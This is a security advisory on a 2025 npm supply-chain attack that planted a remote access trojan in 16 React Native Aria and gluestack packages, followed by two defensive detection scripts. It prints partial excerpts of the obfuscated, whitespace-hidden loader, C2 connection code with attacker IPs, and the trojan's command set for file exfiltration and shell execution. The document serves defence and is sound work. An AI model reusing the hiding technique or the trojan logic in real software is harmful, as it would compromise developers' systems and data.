Tuesday, April 21, 2026

Security Alert – 16 Widely-Used React Native Packages Breached

A sweeping, coordinated attack has struck the heart of the React Native ecosystem, threatening thousands of developers and organizations globally.

Beginning on the evening of June 6, 2025, malicious actors successfully breached at least 16 widely-used npm packages with millions of weekly downloads.

Among the affected packages are @react-native-aria/focus, @react-native-aria/utils, @react-native-aria/overlays, @react-native-aria/interactions, and several more maintained under the React Native Aria umbrella.

The attack also targeted the popular utility library @gluestack-ui/utils.

These compromised packages collectively receive well over a million weekly downloads, putting countless projects at risk of backdoor infiltration.

The attackers exploited maintainer credentials or package ownership, releasing new versions that contained sophisticated, obfuscated backdoors.

The payloads are not only persistent but also evasive, leveraging whitespace-based obfuscation to hide malicious logic from plain view in code editors.

Technical Details of the Attack

The Backdoor Payload

The breach began with the release of @react-native-aria/focus@0.2.10 at 21:33 GMT on June 6, 2025. The attackers made a single, subtle change to the lib/commonjs/index.js file, inserting a line of code that utilized whitespace to embed an off-screen payload, invisible in editors without word wrapping. The following is a pseudo-excerpt of the technique used:

```javascript
global['_V']='8-npm13';global['r']=require;(function(){var mGB='',hsR=615-604;function EgY(i){...};var Uwn=EgY('koosdciqucxbhcmgtanzpylfwurjtrtvrnoes').substr(0,hsR);var VVy='...';var EiK=EgY[Uwn];var ogb='';var ZML=EiK;var Bfb=EiK(ogb,EgY(VVy));var cag=Bfb(EgY('...'));var mfa=ZML(mGB,cag);mfa(9993);return 6161})()
```

Note: Full code omitted for brevity and security—see original source for obfuscated content.

This technique allowed the attackers to deploy a persistent remote access trojan (RAT) that activates upon the package being loaded in a Node.js environment.
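The whitespace trick above is easy to catch mechanically once you know to look for it: a line that ends, as far as an editor shows, with ordinary code, followed by hundreds of blanks and then more code. The scanner below is an added example written for this article; it is not code from the advisory or from the affected packages. The gap and tail thresholds, the `scanFiles` helper, and the sample module text are assumptions, and the sample "payload" is inert filler constructed for the test.

```javascript
// Added example, not code from the advisory or from the affected packages:
// flag source lines that hide code behind a long run of horizontal whitespace,
// the "off-screen" trick described above. Thresholds are assumptions.

const DEFAULT_MIN_GAP = 200;      // assumed: >= 200 consecutive spaces/tabs
const DEFAULT_MIN_TAIL = 20;      // assumed: ignore short trailing fragments

// Scan one file's text. Returns [{ line, gap, visible, hidden }] where
// `visible` is what an editor shows without word wrap and `hidden` is the
// first 80 characters of the code pushed off-screen.
function findOffscreenPayloads(source, opts = {}) {
  const minGap = opts.minGap ?? DEFAULT_MIN_GAP;
  const minTail = opts.minTail ?? DEFAULT_MIN_TAIL;
  // a prefix ending in a non-blank, then the long gap, then more non-blank code
  const pattern = new RegExp('^(.*?\\S)([ \\t]{' + minGap + ',})(\\S.*)$');
  const findings = [];
  const lines = source.split(/\r?\n/);
  for (let i = 0; i < lines.length; i++) {
    const m = pattern.exec(lines[i]);
    if (!m) continue;
    const [, visible, gap, hidden] = m;
    if (hidden.length < minTail) continue;     // trailing comment or stray token
    findings.push({ line: i + 1, gap: gap.length, visible, hidden: hidden.slice(0, 80) });
  }
  return findings;
}

// Scan several files given as [{ path, text }]; findings are tagged with path.
function scanFiles(files, opts) {
  const out = [];
  for (const { path, text } of files) {
    for (const f of findOffscreenPayloads(text, opts)) out.push({ path, ...f });
  }
  return out;
}

// Constructed sample: a normal-looking CommonJS module whose third line carries
// a fake payload 300 spaces to the right. The payload string is inert filler,
// not the real one from the advisory.
const SAMPLE_INDEX_JS = [
  '"use strict";',
  'Object.defineProperty(exports, "__esModule", { value: true });',
  'exports.useFocus = useFocus;' + ' '.repeat(300) +
    "global['_X']='constructed';global['q']=require;(function(){return 0})();",
  'function useFocus() { return {}; }',
].join('\n');

// Typical use: read node_modules/**/index.js with fs and pass them to scanFiles.
for (const h of scanFiles([{ path: 'node_modules/example/lib/commonjs/index.js', text: SAMPLE_INDEX_JS }])) {
  console.log(`${h.path}:${h.line} ${h.gap} blanks hide: ${h.hidden}`);
}
```

The regex keeps the visible prefix lazy, so the first run of at least `minGap` blanks after a non-blank character splits the line; `minTail` stops a long-padded trailing comment from being reported. Run it over an installed `node_modules` tree (or a CI checkout) and treat any hit in a published package as something to inspect by hand.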

Core Malicious Functionality

The RAT performs a variety of exfiltration and remote control operations:

  • System Fingerprinting: Collects hostname, username, OS type, Node.js and system paths, and runtime environment context.
  • Command and Control (C2): Connects to attacker-controlled servers via socket.io, using one of two IPs dynamically selected based on a version tag:

```javascript
const J = d.startsWith('A4') ? 'http://136.0.9[.]8:3306' : "http://85.239.62[.]36:3306";
const K = d.startsWith('A4') ? "http://136.0.9[.]8:27017" : "http://85.239.62[.]36:27017";
```

  • Automated Dependency Installation: Attempts to install required tooling (e.g., socket.io-client, axios, form-data) to establish persistence if missing.
  • Remote Control: Accepts commands over the established WebSocket, enabling operations such as file upload, directory traversal, process manipulation, and arbitrary command execution.
  • Command Examples: The RAT responds to a variety of commands, including:
    • ss_info: Exposes system metadata (OS, Node.js version, timestamps, paths).
    • ss_ip: Queries a public IP API to expose network geolocation and public IP.
    • ss_upf/ss_upd: Supports file and directory upload to attacker servers.
    • ss_fcd: Changes working directory for follow-up commands.
    • ss_stop: Stops ongoing upload operations.
    • Arbitrary shell commands: Executes shell commands in the context of the running process.

Here’s a snippet of how the RAT collects and exposes system information:

```javascript
if (a0 === 'ss_info') {
  a1 = "* _V = " + d + "\n* VERSION = " + "250602" + "\n* OS_INFO = " + q + "\n* NODE_PATH = " + r + "\n* NODE_VERSION = " + s + "\n* STARTUP_TIME = " + u + "\n* STARTUP_PATH = " + v + "\n* __dirname = " + (typeof __dirname === 'undefined' ? "undefined" : __dirname) + "\n* __filename = " + (typeof __filename === 'undefined' ? "undefined" : __filename) + "\n";
}
```

Persistence and Evasion

The RAT is designed to evade detection via:

  • Obfuscation: Use of whitespace and string manipulation to hide code logic.
  • Dynamic Payloads: Configuration-driven backdoor behavior using environment variables and injected version tags.
  • Persistence on Windows: Potential attempts to drop files at `%LOCALAPPDATA%\Programs\Python\Python3127`. The presence of unknown executables or scripts in this location is a strong indicator of compromise.

Indicators of Compromise

Compromised Packages and Versions:

| Package Name | Compromised Version(s) |
| --- | --- |
| @react-native-aria/focus | 0.2.10 |
| @react-native-aria/utils | 0.2.13 |
| @react-native-aria/overlays | 0.3.16 |
| @react-native-aria/interactions | 0.2.17 |
| @react-native-aria/toggle | 0.2.12 |
| @react-native-aria/switch | 0.2.5 |
| @react-native-aria/checkbox | 0.2.11 |
| @react-native-aria/radio | 0.2.14 |
| @react-native-aria/button | 0.2.11 |
| @react-native-aria/menu | 0.2.16 |
| @react-native-aria/listbox | 0.2.10 |
| @react-native-aria/tabs | 0.2.14 |
| @react-native-aria/combobox | 0.2.8 |
| @react-native-aria/disclosure | 0.2.9 |
| @react-native-aria/slider | 0.2.13 |
| @react-native-aria/separator | 0.2.7 |
| @gluestack-ui/utils | 0.1.16, 0.1.17 |

Suspicious IPs:
Check firewall/outbound connections for:

  • 136.0.9.8
  • 85.239.62.36

How to Respond

  • Immediate Action: Remove any impacted package versions. Check your dependency tree and lockfiles for these versions.
  • Security Scanning: Use SAST/DAST tools and threat detection systems to scan for the presence of the backdoor code and outbound connections to known C2 IPs.
  • Incident Response: If any of these packages are found in your environment, assume compromise. Rotate all credentials, review logs for unusual activity, and consider quarantining affected systems.
  • System Hardening: On Windows, scan for suspicious files at `%LOCALAPPDATA%\Programs\Python\Python3127`.
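The first two response steps (checking lockfiles for the versions in the IoC table, and checking outbound connections for the two C2 addresses) can be automated. The script below is an added example written for this article, not code from the advisory or from any of the projects named in it. It carries the package versions and IPs from the IoC section; the `package-lock.json` contents and the firewall log lines are constructed for illustration, and the log format is an assumption.

```javascript
// Added example, not code from the advisory: match a project's package-lock.json
// against the compromised versions in the IoC table and scan outbound
// connection logs for the two C2 addresses. The lockfile and log lines below
// are constructed for illustration.

// Package -> compromised versions, copied from the advisory's IoC table.
const COMPROMISED = {
  '@react-native-aria/focus': ['0.2.10'],
  '@react-native-aria/utils': ['0.2.13'],
  '@react-native-aria/overlays': ['0.3.16'],
  '@react-native-aria/interactions': ['0.2.17'],
  '@react-native-aria/toggle': ['0.2.12'],
  '@react-native-aria/switch': ['0.2.5'],
  '@react-native-aria/checkbox': ['0.2.11'],
  '@react-native-aria/radio': ['0.2.14'],
  '@react-native-aria/button': ['0.2.11'],
  '@react-native-aria/menu': ['0.2.16'],
  '@react-native-aria/listbox': ['0.2.10'],
  '@react-native-aria/tabs': ['0.2.14'],
  '@react-native-aria/combobox': ['0.2.8'],
  '@react-native-aria/disclosure': ['0.2.9'],
  '@react-native-aria/slider': ['0.2.13'],
  '@react-native-aria/separator': ['0.2.7'],
  '@gluestack-ui/utils': ['0.1.16', '0.1.17'],
};

// C2 addresses from the advisory (undefanged so they match real log lines).
const C2_IPS = ['136.0.9.8', '85.239.62.36'];

// Walk a lockfileVersion 1 "dependencies" tree (nested per package).
function walkV1(deps, parentPath, hits) {
  for (const [name, entry] of Object.entries(deps || {})) {
    const path = parentPath + 'node_modules/' + name;
    const bad = COMPROMISED[name];
    if (bad && bad.includes(entry.version)) hits.push({ path, name, version: entry.version });
    walkV1(entry.dependencies, path + '/', hits);
  }
}

// Returns [{ path, name, version }] for every lockfile entry pinned to a
// compromised version. Accepts a JSON string or a parsed object; handles the
// v2/v3 "packages" map and falls back to the v1 "dependencies" tree.
function findCompromisedInLock(lockJson) {
  const lock = typeof lockJson === 'string' ? JSON.parse(lockJson) : lockJson;
  const hits = [];
  if (lock.packages) {
    for (const [path, entry] of Object.entries(lock.packages)) {
      if (path === '') continue;                       // the root project entry
      // name = text after the last "node_modules/", so nested installs resolve
      const idx = path.lastIndexOf('node_modules/');
      const name = entry.name || (idx >= 0 ? path.slice(idx + 'node_modules/'.length) : path);
      const bad = COMPROMISED[name];
      if (bad && bad.includes(entry.version)) hits.push({ path, name, version: entry.version });
    }
  } else {
    walkV1(lock.dependencies, '', hits);
  }
  return hits;
}

// Returns [{ line, ip, text }] for log lines mentioning a C2 address as a
// whole token; "[.]"-defanged forms are normalised before matching.
function findC2Connections(logLines) {
  const matchers = C2_IPS.map(ip =>
    [ip, new RegExp('(?<![\\d.])' + ip.replace(/\./g, '\\.') + '(?![\\d.])')]);
  const hits = [];
  logLines.forEach((raw, i) => {
    const text = raw.replace(/\[\.\]/g, '.');
    for (const [ip, re] of matchers) {
      if (re.test(text)) { hits.push({ line: i + 1, ip, text: raw }); break; }
    }
  });
  return hits;
}

// Constructed lockfile: one direct hit, one version not in the table, one nested hit.
const SAMPLE_LOCK = JSON.stringify({
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/@react-native-aria/focus': { version: '0.2.10' },
    'node_modules/@react-native-aria/utils': { version: '0.2.12' },
    'node_modules/some-lib/node_modules/@gluestack-ui/utils': { version: '0.1.17' },
  },
});

// Constructed firewall log lines (203.0.113.0/24 is documentation address space).
const SAMPLE_LOG = [
  '2025-06-07T02:14:05Z ALLOW TCP 10.0.0.12:51322 -> 136.0.9.8:3306',
  '2025-06-07T02:14:06Z ALLOW TCP 10.0.0.12:51323 -> 203.0.113.5:443',
  '2025-06-07T02:15:11Z ALLOW TCP 10.0.0.12:51340 -> 85.239.62.36:27017',
];

for (const h of findCompromisedInLock(SAMPLE_LOCK)) console.log('compromised:', h.path, h.version);
for (const h of findC2Connections(SAMPLE_LOG)) console.log('C2 contact on line', h.line, h.ip);
```

Feed it the real `package-lock.json` with `fs.readFileSync` and a firewall or proxy export split into lines. A lockfile hit means the version was resolved at some point; because the payload runs when the module is loaded, treat the hit as "assume compromise" per the Incident Response step rather than as a finding to triage later.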

This supply chain attack is ongoing and evolving, with new malicious versions potentially emerging.

The attackers have demonstrated both persistence and sophistication, leveraging obfuscation and dynamic payloads to evade detection.

The React Native and npm communities are urged to remain vigilant, monitor communications from maintainers, and apply security best practices to protect against future threats.
